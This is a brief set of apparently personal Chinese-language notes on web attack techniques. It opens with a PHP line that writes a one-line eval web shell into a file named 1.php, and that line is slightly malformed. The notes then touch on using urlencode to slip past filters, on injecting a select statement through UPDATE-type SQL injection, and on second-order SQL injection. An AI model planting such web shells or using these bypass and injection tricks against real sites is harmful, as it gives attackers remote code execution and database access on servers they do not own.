有时候写入一句话的代码: fputs(fopen('1.php','w'),'<?php eval($_POST[cmd)?>\r\n'); urlencode()函数有时候可能使过滤的代码失效。达到绕过的目的 update类型的注入:直接设置某字段为select 的语句即可 二次注入的问题,某些数据插入到数据库中,然后这些数据在出库的时候带入到sql语句之中,从而造成了注入的问题。